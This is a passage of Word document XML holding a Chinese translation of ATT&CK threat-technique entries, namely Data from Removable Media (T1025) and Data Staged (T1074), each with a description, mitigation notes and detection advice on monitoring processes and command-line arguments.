      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A20F35" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512E46EF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看是否有从网络共享</w:t>
      </w:r>
      <w:r>
        <w:t>收集文件的相关操作</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77642121" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可移动媒介</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="02144093" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5757D4D1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:t xml:space="preserve"> T1025</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F8C2A12" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F36CDB5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="003C13F0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="003C13F0">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="003C13F0">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147E5214" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>访问可移动媒体驱动器和文件的权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D1F7B04" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBF39AB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DFDE6A5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006A35FB" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70863E54" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00DA1092" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前，可以从连接到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统的任何可移动介质（光盘驱动器，</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>USB</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储器等）收集敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69120D0E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以在他们已经入侵的计算机上搜索连接的可移动媒体，以查找感兴趣的文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用交互式命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内的功能来收集信息。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些攻击者还可以在可移动媒体上使用自动收集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748BCBB1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32123DF0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于系统功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DEE4C0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FA54F3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视从系统连接的可移动介质收集文件的操作进程和命令行参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有内置功能的远程访问工具可以直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互以收集数据。</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA1092">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）获取数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B998E6B" w14:textId="09279897" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="005E654D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>暂存</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="0022511E" w14:paraId="5BFEF719" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CF9A7A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>T1074</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A177E1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>技术：采集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D80ADC8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C97B096" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:lastRenderedPageBreak/>
              <w:t>数据源：文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625E7016" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0022511E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0022511E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="0022511E">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F5A64A1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0021444D" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D35991" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前，收集的数据暂存在中央位置或目录中。数据可以保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中，也可以通过数据压缩或数据加密等技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并到</w:t>
      </w:r>
      <w:r>
        <w:t>一个文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1FEACA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互式命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="000771CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="000771CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="000771CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="000771CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r w:rsidRPr="000771CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的通用功能将数据复制到一个临时位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F1C6D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7261A8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01193EA1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40845CBD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>似乎正在从不同位置读取文件并写入同一目录或文件的进程可能表示正在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分步处理数据，尤其是</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怀疑它们对文件执行加密或压缩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
      <w:r w:rsidRPr="00631363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E6859F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程和命令行参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看是否有收集和</w:t>
      </w:r>
      <w:r>
        <w:t>合并文件的相关操作</w:t>
      </w:r>
      <w:r w:rsidRPr="0022511E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集数据并复制</w:t>
      </w:r>
      <w:r>
        <w:t>到某路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
